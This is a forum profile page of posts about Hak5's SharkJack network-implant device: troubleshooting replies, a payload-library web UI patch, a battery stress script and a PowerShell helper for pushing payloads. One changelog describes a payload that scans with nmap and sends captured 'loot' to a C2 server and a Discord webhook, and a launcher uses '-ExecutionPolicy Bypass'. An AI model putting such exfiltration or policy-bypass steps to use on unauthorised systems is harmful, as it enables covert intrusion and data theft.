Jump to content

REDD

Active Members
  • Posts

    144
  • Joined

  • Last visited

  • Days Won

    9

Everything posted by REDD

  1. Very interesting, I can insert both straight into the Ethernet Port or via USB Adapter and get responses from both.. I just reinstalled the firmware on the spare SharkJack I have and no issues. I think this issue is due to your setup.
  2. Should be able to "Connect to SSH" and "Connect to WebUI" if your SharkJack is updated.
  3. And the WebUI is the IP of the SharkJack (1.1.0+ Firmware) in your browser once the device is in Arming Mode and detected by the machine. Aka. http://172.16.24.1/
  4. Use the PowerShell Script and tell me if it even detects it in Arming Mode and what options don't work (besides SharkLib options - it's obsolete since the patch). https://forums.hak5.org/topic/51075-tool-sharkjackps1-powershell-version-of-sharkjacksh/
  5. We are gonna need a little more information about: - How you have it connected to the machine? - Are you able to connect to the WebUI at all when in Arming mode while connected? - Have you factory reset the device and still have the same issues?
  6. I think you are misunderstanding what the SharkJack is.. It's a tiny OpenWRT box with a 5-15 min battery.. It only has about 27MB of free space to store Payloads on so you're pretty limited to the extent of the device. There's a bunch of tools, Payloads and opinions on the forums and GitHubs.
  7. @wulf I added a terminal version to the patch. Let me know what you think.. Download version 1.11 of the patch, "Remove Patch", then "Install Patch" again.. It will give you a library command via SSH. Enjoy!
  8. "Enhanced Version" will be released in 24-48 hours. - I like the idea. And thanks!
  9. Thanks! I try to just make the device as easy as I can for everyone.. 😁
  10. If you try to add this with the Web UI, it wont work.. You'll have to follow the "Workaround" for adding this Payload into the Payload Library.. It contains characters the "Payload" tab doesn't like.. Lol
  11. Feb 3rd, 2021: Version 1.11 - Minor fixes to patcher-win.cmd file. Fixes errors with some Windows users having errors with script seeing local files. Feb 3rd, 2021: Version 1.1 - Adds Shell "library" command to the patch. (Formly SharkLib) Adds fixes to library command to make compatible with Patch WebUI Library. Jan 29th, 2021: Version 1.0d - Public Release of Patch.
  12. Payload Library for Web UI/SSH (Unofficial Patch) This (unofficial) Patch provides the Official SharkJack Web UI with a additional Tab on the Web UI (http://172.16.24.1/) to maintain your payloads on the Device itself rather than relying on a PC to switch to your prior used payloads. I personally figured since the SharkJack has not received any Love in over a year, I'd give it a little attention. Since it was missing a Payload Management System on the device (That is accessible via Web UI), I decided to make one. I attempted to "copy" the original style of the original Web UI. - Taking the POST methods and programming style of the previous developer to try to bring features without "adding" dependencies to the SharkJack. I have also included a Patcher for both Windows Machines and Unix/Mac's (Utilizing the current sharkjack.sh tool from Hak5 - Kudos Devs) to make this feature available to everyone. Enjoy! Features: Backup your current Payload to the Library. Download any Payload in the Library. Restore any Payload in the Library. Delete any Payload in the Library. Adds "library" command to SharkJack. - Allows ALL the same features as the WebUI Library Tab and is CROSS-COMPATIABLE! Example Screenshot of the Library via WebUI: Screenshot of Library ("library" command) via SSH: What is needed to Install: Sharkjack with 1.1.0 firmware or higher installed. Ethernet Port on Local Machine to connect the SharkJack. Administrator/Root user on Local Machine. How to Install: Head to https://github.com/InfoSecREDD/sj-webui-patch/releases Download the most current release (.zip or .tar.gz). Unzip the downloaded file to a location of your choice. Connect your SharkJack in ARMING MODE to the Ethernet Port on your local machine. Run the appropriate Patcher for your OS. (Windows: patcher-win.cmd, Linux/Mac: patcher-linux.sh) Select "1" on the menu and follow the Patcher's Instructions. Once Patcher is finished, Head to the SharkJack Web UI to verify it has been installed. (http://172.16.24.1/) Enjoy! How to Remove: (If already downloaded & unzipped. Skip to Step #4) Head to https://github.com/InfoSecREDD/sj-webui-patch/releases Download the most current release (.zip or .tar.gz). Unzip the downloaded file to a location of your choice. Connect your SharkJack in ARMING MODE to the Ethernet Port on your local machine. Run the appropriate Patcher for your OS. (Windows: patcher-win.cmd, Linux/Mac: patcher-linux.sh) Select "2" on the menu and follow the Patcher's Instructions. Once Patcher is finished, Head to the SharkJack Web UI to verify it has been removed. (http://172.16.24.1/) (Your Payloads will remain saved on the device under /root/library/ - We don't want to delete your payloads without your confirmation.) How to use the Web UI Library: Connect the SharkJack in ARMING MODE to the Ethernet Port on your Local Machine. Open up your Browser of choice (Chrome, Firefox, Brave, Opera, Edge (🤮), etc) and go to "http://172.16.24.1/". Navigate to the "Library" tab on the Top Menu. Input your desired Payload Name in the Backup input field box and click the "BACKUP" button. Click "Ok" on the Window Alert. The Page will instantly refresh. (At this point you can choose to "Restore", "Download", and "Delete" that payload.) Enjoy! How to use the Terminal Extension: Connect the SharkJack in ARMING MODE to the Ethernet Port on your Local Machine. Open up your SSH Client of choice (PuTTy, Linux Terminal, PowerShell/CMD(if OpenSSH Client (Beta) Feature is installed on Windows 10)) and connect to 172.16.24.1 with your credentials. Type "library" and hit [Enter] in the shell and follow the prompted Menu. Enjoy! Known Issues: Payload Tab - Payload text that includes certain special characters do not translate in POST Method. (SharkJack 1.1.0 - 1.0.1 WebUI Issue.) This issue has nothing to do with this patcher or project. (See workaround below) Payload Tab - Payload text that exceeds certain character limit stalls and does not post payload content to correct location. (SharkJack 1.1.0 - 1.0.1 WebUI Issue.) This issue has nothing to do with this patcher or project. (See workaround below) Workaround for Payload Tab Issues: Connect to SharkJack via SSH and use SCP to transfer payloads to "/root/payload/payload.sh". It will appear in the "Payload Tab" and you'll be able to backup/restore the payload using the Library Tab. If using a SFTP Client, make sure your Text Editor is formatted for "UNIX Style Formatting" otherwise you will end up with "^M", etc, after each line. - Then transfer the appropriate Payload to "/root/payload/payload.sh". It will appear in the "Payload Tab" and you'll be able to backup/restore the payload using the Library Tab. Source GitHub Repo: https://github.com/InfoSecREDD/sj-webui-patch Patch.sh Source: https://github.com/InfoSecREDD/sj-webui-patch/blob/main/patch.sh Payload Library Source: https://github.com/InfoSecREDD/sj-webui-patch/blob/main/patch/library.sh Patcher-Win Source: https://github.com/InfoSecREDD/sj-webui-patch/blob/main/patcher-win.cmd Patcher-Linux Source: https://github.com/InfoSecREDD/sj-webui-patch/blob/main/patcher-linux.sh Payload Library Shell Extension: https://github.com/InfoSecREDD/sj-webui-patch/blob/main/patch/library
  13. Most likely Windows based if they're using a VBOX Kali VM, I would help but I've never passed a Ethernet port thru. But should be the same options for VirtualBox software cross platforms.
  14. When I use it on a VM or VBox setup, I use a USB to Ethernet Adapter and pass the USB through to the VM. Good Luck.
  15. Version 1.3 (Jan 23rd 2021): Added Discord Webhook Integration to the Payload as a alternate source of acquiring loot from the SharkJack. Added Optional "send as file" or "send as plain text messages" to the payload. Version 1.2 (Jan 22nd 2021): Fixed Errors with C2CONNECT and EXFIL not working correctly as intended in script. Added forced wait until nmap finished to look for loot. Cleaned up script process.
  16. This happens when the payload isn't set correctly or is the wrong firmware version for the Payload.
  17. Yeah, you can change it whatever you feel like. This was a more of a proof of concept to use ARP to find the correct subnet.
  18. @Darren Kitchen Currently mine only gets like 2 mins "Under Load".. Not sure if that's good thing.. Battery Test Date: Tue Jan 28 13:48:57 UTC 2020 ================================================== Battery Test running for 20 minutes and 0 seconds. Battery Status: full -> LOAD created by sha256sum. ================================================== [01:48:57 PM] -> LOAD: YES - CPU Load: 18.0481% [Battery Status: full] [01:48:57 PM] -> LOAD: YES - CPU Load: 18.0588% [Battery Status: full] [01:48:59 PM] -> LOAD: YES - CPU Load: 18.1068% [Battery Status: full] [01:49:00 PM] -> LOAD: YES - CPU Load: 18.1528% [Battery Status: discharging] [01:49:01 PM] -> LOAD: YES - CPU Load: 18.1969% [Battery Status: discharging] [01:49:02 PM] -> LOAD: YES - CPU Load: 18.2414% [Battery Status: discharging] [01:49:03 PM] -> LOAD: YES - CPU Load: 18.2865% [Battery Status: discharging] [01:49:05 PM] -> LOAD: YES - CPU Load: 18.3312% [Battery Status: discharging] [01:49:06 PM] -> LOAD: YES - CPU Load: 18.3785% [Battery Status: discharging] [01:49:07 PM] -> LOAD: YES - CPU Load: 18.4227% [Battery Status: discharging] [01:49:08 PM] -> LOAD: YES - CPU Load: 18.4666% [Battery Status: discharging] [01:49:09 PM] -> LOAD: YES - CPU Load: 18.5114% [Battery Status: discharging] [01:49:11 PM] -> LOAD: YES - CPU Load: 18.5555% [Battery Status: discharging] [01:49:12 PM] -> LOAD: YES - CPU Load: 18.6026% [Battery Status: discharging] [01:49:13 PM] -> LOAD: YES - CPU Load: 18.6469% [Battery Status: discharging] [01:49:14 PM] -> LOAD: YES - CPU Load: 18.6905% [Battery Status: discharging] [01:49:15 PM] -> LOAD: YES - CPU Load: 18.734% [Battery Status: discharging] [01:49:17 PM] -> LOAD: YES - CPU Load: 18.7782% [Battery Status: discharging] [01:49:18 PM] -> LOAD: YES - CPU Load: 18.8258% [Battery Status: discharging] [01:49:19 PM] -> LOAD: YES - CPU Load: 18.8703% [Battery Status: discharging] [01:49:20 PM] -> LOAD: YES - CPU Load: 18.9136% [Battery Status: discharging] [01:49:21 PM] -> LOAD: YES - CPU Load: 18.9569% [Battery Status: discharging] [01:49:22 PM] -> LOAD: YES - CPU Load: 19.0009% [Battery Status: discharging] [01:49:24 PM] -> LOAD: YES - CPU Load: 19.0474% [Battery Status: discharging] [01:49:25 PM] -> LOAD: YES - CPU Load: 19.0917% [Battery Status: discharging] [01:49:26 PM] -> LOAD: YES - CPU Load: 19.1344% [Battery Status: discharging] [01:49:27 PM] -> LOAD: YES - CPU Load: 19.1778% [Battery Status: discharging] [01:49:28 PM] -> LOAD: YES - CPU Load: 19.2215% [Battery Status: discharging] [01:49:30 PM] -> LOAD: YES - CPU Load: 19.2674% [Battery Status: discharging] [01:49:31 PM] -> LOAD: YES - CPU Load: 19.3126% [Battery Status: discharging] [01:49:32 PM] -> LOAD: YES - CPU Load: 19.3558% [Battery Status: discharging] [01:49:33 PM] -> LOAD: YES - CPU Load: 19.399% [Battery Status: discharging] [01:49:34 PM] -> LOAD: YES - CPU Load: 19.4421% [Battery Status: discharging] [01:49:36 PM] -> LOAD: YES - CPU Load: 19.4889% [Battery Status: discharging] [01:49:37 PM] -> LOAD: YES - CPU Load: 19.5334% [Battery Status: discharging] [01:49:38 PM] -> LOAD: YES - CPU Load: 19.5764% [Battery Status: discharging] [01:49:39 PM] -> LOAD: YES - CPU Load: 19.6208% [Battery Status: discharging] [01:49:40 PM] -> LOAD: YES - CPU Load: 19.6644% [Battery Status: discharging] [01:49:42 PM] -> LOAD: YES - CPU Load: 19.7087% [Battery Status: discharging] [01:49:43 PM] -> LOAD: YES - CPU Load: 19.7544% [Battery Status: discharging] [01:49:44 PM] -> LOAD: YES - CPU Load: 19.7972% [Battery Status: discharging] [01:49:45 PM] -> LOAD: YES - CPU Load: 19.8395% [Battery Status: discharging] [01:49:46 PM] -> LOAD: YES - CPU Load: 19.8826% [Battery Status: discharging] [01:49:48 PM] -> LOAD: YES - CPU Load: 19.9259% [Battery Status: discharging] [01:49:49 PM] -> LOAD: YES - CPU Load: 19.9717% [Battery Status: discharging] [01:49:50 PM] -> LOAD: YES - CPU Load: 20.015% [Battery Status: discharging] [01:49:51 PM] -> LOAD: YES - CPU Load: 20.0571% [Battery Status: discharging] [01:49:52 PM] -> LOAD: YES - CPU Load: 20.0995% [Battery Status: discharging] [01:49:54 PM] -> LOAD: YES - CPU Load: 20.1419% [Battery Status: discharging] [01:49:55 PM] -> LOAD: YES - CPU Load: 20.1879% [Battery Status: discharging] [01:49:56 PM] -> LOAD: YES - CPU Load: 20.2309% [Battery Status: discharging] [01:49:57 PM] -> LOAD: YES - CPU Load: 20.2728% [Battery Status: discharging] [01:49:58 PM] -> LOAD: YES - CPU Load: 20.315% [Battery Status: discharging] [01:50:00 PM] -> LOAD: YES - CPU Load: 20.3575% [Battery Status: discharging] [01:50:01 PM] -> LOAD: YES - CPU Load: 20.4021% [Battery Status: discharging] [01:50:02 PM] -> LOAD: YES - CPU Load: 20.4453% [Battery Status: discharging] [01:50:03 PM] -> LOAD: YES - CPU Load: 20.4869% [Battery Status: discharging] [01:50:04 PM] -> LOAD: YES - CPU Load: 20.5289% [Battery Status: discharging] [01:50:06 PM] -> LOAD: YES - CPU Load: 20.5712% [Battery Status: discharging] [01:50:07 PM] -> LOAD: YES - CPU Load: 20.6152% [Battery Status: discharging] [01:50:08 PM] -> LOAD: YES - CPU Load: 20.6585% [Battery Status: discharging] [01:50:09 PM] -> LOAD: YES - CPU Load: 20.6996% [Battery Status: discharging] [01:50:10 PM] -> LOAD: YES - CPU Load: 20.7406% [Battery Status: discharging] --- END OF FILE ---
  19. Battery Tester/CPU Stress For the SharkJack I keep seeing people talk about how the battery lasts less then 10 minutes, etc etc etc.. I made a script to test and prove the Battery Drains incredibly fast under load. Further more... The Script.. (NOTE: This Script should be ran on the SharkJack itself!) battery-tester.sh #!/bin/bash # Title : Battery Tester/CPU Stress # Author : REDD of Private-Locker # Version : 1.1 # Description : The script uses a simple log system to pull the # batteries status, date, and time into a log file for Hak5 # to help diagnose the issues. Also uses "sha256sum" to verify # a null file leaving it to stress the CPU. # # Log File : /root/battery.log # Set to YES to stress the CPU during Battery Test. MAX_LOAD=YES STRESS="sha256sum" # Time in seconds to report in log. (20 mins = 1200) TIME=600 # Initial Script Variables - DO NOT CHANGE UNDER_LOAD=0 DATE_NOW=$(date +'%r') START_TIME=$(date) CPU_USAGE=$(grep 'cpu ' /proc/stat | awk '{usage=($2+$4)*100/($2+$4+$5)} END {print usage "%"}') BATTERY_STATUS=$(BATTERY) LOG_FILE="/root/battery.log" function DISPLAY_TIME () { MINS=$((TIME / 60)) SECS=$((TIME % 60)) if [ "$TIME" -ge "60" ]; then printf "$MINS minutes and $SECS seconds" else printf "$SECS seconds" fi } TOTAL_TIME=$(DISPLAY_TIME "$TIME") if [ ! -f "$LOG_FILE" ]; then touch "$LOG_FILE" fi if [ -f "$LOG_FILE" ]; then echo -e "" >> "$LOG_FILE" echo -e " Battery Test Date: $START_TIME" >> "$LOG_FILE" echo -e "==================================================" >> "$LOG_FILE" echo -e "" >> "$LOG_FILE" echo -e "" echo -e " Battery Test Date: $START_TIME" echo -e "\n Battery Test running for $TOTAL_TIME." echo -e " Battery Test running for $TOTAL_TIME." >> "$LOG_FILE" echo -e " Battery Status: $BATTERY_STATUS" echo -e " Battery Status: $BATTERY_STATUS" >> "$LOG_FILE" echo -e "" if [ "$MAX_LOAD" == "YES" ]; then echo -e "\n\n -> LOAD created by $STRESS." echo -e " -> LOAD created by $STRESS." >> "$LOG_FILE" echo -e "" >> "$LOG_FILE" echo -e "==================================================" >> "$LOG_FILE" echo -e "" >> "$LOG_FILE" fi echo -e "" >> "$LOG_FILE" fi echo -e "[${DATE_NOW}] -> LOAD: $MAX_LOAD - CPU Load: ${CPU_USAGE} [Battery Status: ${BATTERY_STATUS}]" >> "$LOG_FILE" for ((i=0; i<=TIME; i++)); do if [ "$MAX_LOAD" == "YES" ]; then if [ "$UNDER_LOAD" == "0" ]; then UNDER_LOAD=1 $STRESS /dev/zero & fi fi DATE_NOW=$(date +'%r') CPU_USAGE=$(grep 'cpu ' /proc/stat | awk '{usage=($2+$4)*100/($2+$4+$5)} END {print usage "%"}') BATTERY_STATUS=$(BATTERY) printf "[%s%s] -> LOAD: %s - CPU Load: %s [Battery Status: %s]\r" $DATE_NOW $MAX_LOAD $CPU_USAGE $BATTERY_STATUS echo -e "[${DATE_NOW}] -> LOAD: $MAX_LOAD - CPU Load: ${CPU_USAGE} [Battery Status: ${BATTERY_STATUS}]" >> "$LOG_FILE" sleep 1; done if [ "$UNDER_LOAD" == "1" ]; then killall -9 $STRESS fi echo -e "" >> "$LOG_FILE" echo -e "==================================================" >> "$LOG_FILE" echo -e "" >> "$LOG_FILE" # Blank line for running in Terminal. printf " \n" printf "Finished.\n" Output Example: Battery Test Date: Tue Jan 28 13:47:30 UTC 2020 ================================================== Battery Test running for 10 seconds. Battery Status: full [01:47:30 PM] -> LOAD: NO - CPU Load: 18.0325% [Battery Status: full] [01:47:30 PM] -> LOAD: NO - CPU Load: 18.0437% [Battery Status: full] [01:47:31 PM] -> LOAD: NO - CPU Load: 18.0428% [Battery Status: full] [01:47:32 PM] -> LOAD: NO - CPU Load: 18.0432% [Battery Status: full] [01:47:33 PM] -> LOAD: NO - CPU Load: 18.0469% [Battery Status: full] [01:47:34 PM] -> LOAD: NO - CPU Load: 18.0515% [Battery Status: full] [01:47:35 PM] -> LOAD: NO - CPU Load: 18.0556% [Battery Status: full] [01:47:37 PM] -> LOAD: NO - CPU Load: 18.0596% [Battery Status: full] [01:47:38 PM] -> LOAD: NO - CPU Load: 18.0641% [Battery Status: full] [01:47:39 PM] -> LOAD: NO - CPU Load: 18.0678% [Battery Status: full] [01:47:40 PM] -> LOAD: NO - CPU Load: 18.0718% [Battery Status: full] [01:47:41 PM] -> LOAD: NO - CPU Load: 18.0759% [Battery Status: full] ================================================== I really hope this helps everyone else in their troubles in finding out if their Battery is just defective or it's just "Under Load" that makes it so short.
  20. Launching the *.ps1 File: - Open up Notepad or any Text Editor of your choice. - Copy and Paste the following code in the Text Editor. @echo off cls PowerShell.exe -ExecutionPolicy Bypass -File %~dp0sharkjack.ps1 exit /b - Go to "File", then click "Save As..". - Save the file as "launcher.cmd", and Save the File in the same Directory(folder) as the sharkjack.ps1 file. - Close the Text Editor and double-click on "launcher.cmd" file you have just created. Enjoy
  21. Sharkjack.ps1 This is a rewritten (Windows) PowerShell version of Hak5's "sharkjack.sh". Compliments to Hak5 for the Device and the original script. I only take credit for rewriting the script to support Windows. Please Note: SharkLib Options are DISABLED until Hak5 merges SharkLib into the GitHub. If you are having problems getting the file to run. See Post #3. (If you have multiple SharkJacks, type "clearssh" in menu to clear your "known hosts" SSH File of the SharkJack's Fingerprint. Then try to reconnect using SSH via option #5) sharkjack.ps1 # Title: SharkJack Helper Script (PowerShell) # Author: Hak5 (rewritten for Windows by REDD) # Version: 1.2 # Remove for Debugging purposes. $ErrorActionPreference = "SilentlyContinue" # Base Script Variables - DO NOT CHANGE Write-Host "Initializing... One Moment Please..." $console = $host.ui.rawui $console.backgroundcolor = "Black" $console.foregroundcolor = "Green" $colors = $host.privatedata $colors.verbosebackgroundcolor = "Yellow" $colors.verboseforegroundcolor = "Black" $colors.warningbackgroundcolor = "Red" $colors.warningforegroundcolor = "white" $colors.ErrorBackgroundColor = "DarkCyan" $colors.ErrorForegroundColor = "Yellow" $DIR = Convert-Path . # Script Variables $SHARKJACK_IP = "172.16.24.1" $REMOTE_PAYLOAD = "root@$SHARKJACK_IP`:/root/payload/payload.sh" $UPGRADE_FILE = 'https://downloads.hak5.org/api/devices/sharkjack/firmwares/1.1.0' $BASEFILENAME = "upgrade-1.1.0.bin" $FIRMWARE_SHA = "03638c7937a1718b6535116eac8b0a75f2a79054e61dc401af56b51da2044386" $PAYLOADDIR = $DIR+'\library' $MENU_SELECTION = 0 $CIRCLE = ([char]8226) Function Header_Ascii { Write-Host "" Write-Host " ########################################################" Write-Host "" Write-Host "" Write-Host " \_____)\_____ Shark Jack _____/(_____/" Write-Host " /--v____ __$CIRCLE< by Hak5 >$($CIRCLE)__ ____v--\" Write-Host " )/ \(" Write-Host "" Write-Host "" Write-Host " ########################################################" Write-Host " Windows Version by REDD" Write-Host "" } Function Initialize { $CONN_SUCC = 0 $LOOP = 0 while ($CONN_SUCC -eq 0) { $connection = Test-Connection "$SHARKJACK_IP" -Count 1 -Quiet If ($connection -eq $true) { Write-Host "SharkJack detected.." Start-Sleep -s 2 $CONN_SUCC = 1; } ElseIf ($connection -eq $false) { If ($LOOP -eq 0) { Write-Host -NoNewline "Please Connect the SharkJack in Arming Mode.." Start-Sleep -s 2 $LOOP = 1; } Else { Write-Host -NoNewline "." Start-Sleep -s 2 } } } } Function Download_Repo { Write-Host "Checking if Connection to Internet is possible with SharkJack connected." Write-Host "" Write-Host "Please Wait.." Write-Host "" $HTTP_Request = [System.Net.WebRequest]::Create('http://google.com') $HTTP_Response = $HTTP_Request.GetResponse() $HTTP_Status = [int]$HTTP_Response.StatusCode If ($HTTP_Status -eq 200) { Write-Host " -> Connection established!" $Connection_Check = 1 } Else { Write-Host " -> Connection Failed!" $Connection_Check = 0 } If ($HTTP_Response -eq $null) { } Else { $HTTP_Response.Close() } Write-Host "" if ( $Connection_Check -eq 1 ) { if (!(Test-Path $PAYLOADDIR)) { Write-Host "Downloading Payload Library from GitHub.. Please Wait." $WebClient = New-Object System.Net.WebClient $WebClient.DownloadFile("https://github.com/hak5/sharkjack-payloads/archive/master.zip","$DIR\master.zip") Write-Host "Extracting Payload Library.." Expand-Archive -LiteralPath $DIR\master.zip -DestinationPath $DIR Get-ChildItem -Path "$DIR\sharkjack-payloads-master" | Copy-Item -Force -Destination "$DIR" -Recurse -Container Get-ChildItem -Path "$DIR\sharkjack-payloads-master\payloads" | Copy-Item -Force -Destination "$DIR" -Recurse -Container Remove-Item $DIR\sharkjack-payloads-master -Force -Recurse -ErrorAction SilentlyContinue Remove-Item $DIR\payloads -Force -Recurse -ErrorAction SilentlyContinue Write-Host "Cleaning up Repo Files.." Remove-Item -path $DIR\master.zip -force Remove-Item -path $DIR\README.md -force Remove-Item -path $DIR\sharkjack.sh -force Write-Host "Finished." Start-Sleep -s 2 } Else { Write-Host "Payload Directory is already present in current Folder." Start-Sleep -s 2 } } Else { Write-Host " Disconnect the SharkJack from the PC OR Set your Internet to" Write-Host " the correct configurations, and try again." Start-Sleep -s 15 } } Function Copy_Payload { if (!(Test-Path $PAYLOADDIR)) { Write-Host "No Payload Library downloaded. Starting Downloading Process." Start-Sleep -s 2 Download_Repo } Initialize $MAINFOLDERS = @(Get-ChildItem $PAYLOADDIR | Select Name | Sort @{Expression={$_.name.length}} -Descending | Out-GridView -Title 'Choose a Directory' -PassThru | Select -ExpandProperty "Name") if (!($MAINFOLDERS)) { Write-Host "ERROR: Please Select a Folder."; Start-Sleep -s 2; Menu-Function } $PAYLOADSELECTDIR = @(Get-ChildItem $PAYLOADDIR\$MAINFOLDERS | Select Name | Sort @{Expression={$_.name.length}} -Descending | Out-GridView -Title 'Choose a Payload' -PassThru | Select -ExpandProperty "Name") if (!($PAYLOADSELECTDIR)) { Write-Host "ERROR: Please Select a Payload."; Start-Sleep -s 2; Menu-Function } $SELECTED_PAYLOAD = $PAYLOADDIR+'\'+$MAINFOLDERS+'\'+$PAYLOADSELECTDIR+'\payload.sh' Write-Host "Copying ->" Write-Host "Source Payload: $SELECTED_PAYLOAD" Write-Host "Destin Payload: $DIR\payload.sh" Write-Host "Remote Payload: $REMOTE_PAYLOAD" Write-Host "" Copy-Item "$SELECTED_PAYLOAD" -Destination "$DIR\payload.sh" Write-Host "Attempting to Push Payload to SharkJack.." scp "$DIR\payload.sh" "$REMOTE_PAYLOAD" Write-Host "Finished." Start-Sleep -s 2 Menu-Function } Function Copy_Dir_Payload { $Current_Payload = $DIR+'\payload.sh' if (!(Test-Path "$Current_Payload" -PathType Leaf)) { Write-Host "No $Current_Payload exists." Start-Sleep -s 7 } Else { Initialize Write-Host "Attempting to Push Payload to SharkJack.." scp "$DIR\payload.sh" "$REMOTE_PAYLOAD" Write-Host "Finished." Start-Sleep -s 2 Menu-Function } } Function Connect_SharkJack { Initialize Write-Host "Attempting to Connect (SSH) to the SharkJack.." ssh "root`@$SHARKJACK_IP" Write-Host "Done." Start-Sleep -s 2 Menu-Function } Function Clean_Known_Hosts { Write-Host "Clearing old SSH Keys for SharkJack. Please Wait.." Get-Content $env:userprofile\.ssh\known_hosts | select-string -pattern "$SHARKJACK_IP" -notmatch | Out-File $env:userprofile\.ssh\known_hosts.new Copy-Item "$env:userprofile\.ssh\known_hosts" -Destination "$env:userprofile\.ssh\known_hosts.bk" Remove-Item -path $env:userprofile\.ssh\known_hosts -force Copy-Item "$env:userprofile\.ssh\known_hosts.new" -Destination "$env:userprofile\.ssh\known_hosts" Remove-Item -path $env:userprofile\.ssh\known_hosts.new -force Write-Host "Removed old SSH Keys for SharkJack. Try to connect again via SSH." Start-Sleep -s 3 Menu-Function } Function Connect_SharkJack_Web { Initialize Write-Host "Attempting to Launch Browser to connect to SharkJack.." start "http://$SHARKJACK_IP/cgi-bin/status.sh" Menu-Function } Function Update_SharkJack { Write-Host "Checking if Connection to Internet is possible with SharkJack connected." Write-Host "" Write-Host "Please Wait.." Write-Host "" $HTTP_Request = [System.Net.WebRequest]::Create('http://google.com') $HTTP_Response = $HTTP_Request.GetResponse() $HTTP_Status = [int]$HTTP_Response.StatusCode If ($HTTP_Status -eq 200) { Write-Host " -> Connection established!" $Connection_Check = 1 } Else { Write-Host " -> Connection Failed!" $Connection_Check = 0 } If ($HTTP_Response -eq $null) { } Else { $HTTP_Response.Close() } If ( $Connection_Check -eq 1 ) { $FIRMWARE_FILE = $DIR+'\'+$BASEFILENAME Write-Host "Downloading Firmware from $UPGRADE_FILE" $WebClient = New-Object System.Net.WebClient $WebClient.DownloadFile("$UPGRADE_FILE","$FIRMWARE_FILE") Write-Host "Checking SHA256 of $FIRMWARE_FILE" $CHK_DOWNLOAD = (Get-FileHash -Path $FIRMWARE_FILE -Algorithm "SHA256" -ErrorAction Stop).Hash If ($CHK_DOWNLOAD -ne $FIRMWARE_SHA) { Write-Host "SHA265 DOES NOT MATCH! Deleting $BASEFILENAME" del "$FIRMWARE_FILE" Write-Host "Done. Please Retry again." Start-Sleep -s 5 Menu-Function } Else { Write-Host "SHA256 Matches! Continuing Upgrade.." Write-Host "" Write-Host "Attempting to start the Upgrade Process.." Write-Host "------------------------------------------------------" Write-Host "PLEASE ONLY DO THIS IF YOU KNOW WHAT VERSION YOUR" Write-Host "SHARKJACK IS ON." Write-Host "" $Confirm_Update = Read-Host "THIS WILL ERASE EVERYTHING ON THE SHARKJACK! ARE YOU SURE? (y/[N])" Switch ($Confirm_Update) { Y {Write-host "Confirmed!"; $Update_Confirm_Status = 1} N {Write-Host "Not Confirmed!"; $Update_Confirm_Status = 0} Default {Write-Host "No Input detected. Defaulting to NO."; $Update_Confirm_Status = 0} } If ( $Update_Confirm_Status -eq 1 ) { Initialize Write-Host "Wait 5-10 minutes as the Shark Jack flashes the firmware and reboots." Write-Host "DO NOT unplug the device from USB power during this process as doing so will render the device inoperable." Write-Host "" Write-Host "Pushing $BASEFILENAME to SharkJack." scp "$FIRMWARE_FILE" "root`@$SHARKJACK_IP`:/tmp/$BASEFILENAME" Write-Host "Initializing Upgrade.." ssh "root`@$SHARKJACK_IP" "sysupgrade -n /tmp/$BASEFILENAME" Write-Host "Upgrade started.. Waiting 30s.." Start-Sleep -s 30 Write-Host "Wait for SharkJack to start in Arming Mode.." Write-Host "" Write-Host "Once SharkJack has shut itself down.. It will reboot." Start-Sleep -s 2; Initialize } Else { Write-Host "Returning to Menu." Start-Sleep -s 2 Menu-Function } } } Else { Write-Host " Disconnect the SharkJack from the PC OR Set your Internet to" Write-Host " the correct configurations, and try again." Start-Sleep -s 15 } } Function Cleanup { if (Test-Path $PAYLOADDIR) { Write-Host "Found $PAYLOADDIR.. Removing.." Remove-Item $PAYLOADDIR -Force -Recurse -ErrorAction SilentlyContinue } if (Test-Path $DIR\sharkjack.sh) { Write-Host "Found sharkjack.sh.. Removing.." Remove-Item $DIR\sharkjack.sh -Force } if (Test-Path $DIR\$BASEFILENAME) { Write-Host "Found $BASEFILENAME.. Removing.." Remove-Item $DIR\$BASEFILENAME -Force } if (Test-Path $DIR\payload.sh) { Write-Host "Found payload.sh.. Removing.." Remove-Item $DIR\payload.sh -Force } Write-Host "Everything cleaned up." Start-Sleep -s 2 Menu-Function } Function Disabled_Func { Write-Host "" Write-Host "ERROR: Sorry the Selection you made has been disabled." Write-Host "ERROR: Please contact REDD or Hak5 regarding this message." Write-Host "" Start-Sleep -s 5 Menu-Function } Function Menu-Function { $MENU_SELECTION = 0 clear Header_Ascii $type=Read-Host " 1 - [D]ownload Payload Library from GitHub 2 - Install SharkLib to Shark[J]ack 3 - Remove Shark[L]ib from SharkJack 4 - [C]opy Payload to SharkJack (Interactive) 5 - Copy [P]ayload from SharkJack.ps1 Directory 6 - Connect to SharkJack [S]SH 7 - Connect to SharkJack [W]eb UI (1.0.1+) 8 - [U]pdate SharkJack 9 - [R]emove ALL Downloaded Files 0 - [E]xit Please select a # OR [L]etter and press ENTER" Switch ($type){ 1 {$MENU_SELECTION = 1; Download_Repo} D {$MENU_SELECTION = 1; Download_Repo} 2 {$MENU_SELECTION = 1; Disabled_Func} 3 {$MENU_SELECTION = 1; Disabled_Func} 4 {$MENU_SELECTION = 1; Copy_Payload} C {$MENU_SELECTION = 1; Copy_Payload} 5 {$MENU_SELECTION = 1; Copy_Dir_Payload} P {$MENU_SELECTION = 1; Copy_Dir_Payload} 6 {$MENU_SELECTION = 1; Connect_SharkJack} S {$MENU_SELECTION = 1; Connect_SharkJack} 7 {$MENU_SELECTION = 1; Connect_SharkJack_Web} W {$MENU_SELECTION = 1; Connect_SharkJack_Web} 8 {$MENU_SELECTION = 1; Update_SharkJack} U {$MENU_SELECTION = 1; Update_SharkJack} 9 {$MENU_SELECTION = 1; Cleanup} R {$MENU_SELECTION = 1; Cleanup} clearssh { $MENU_SELECTION = 1; Clean_Known_Hosts} E { Write-Host "Exiting.. Please Wait."; Exit } 0 { Write-Host "Exiting.. Please Wait."; Exit } } } Initialize while ($MENU_SELECTION -eq 0) { Menu-Function }
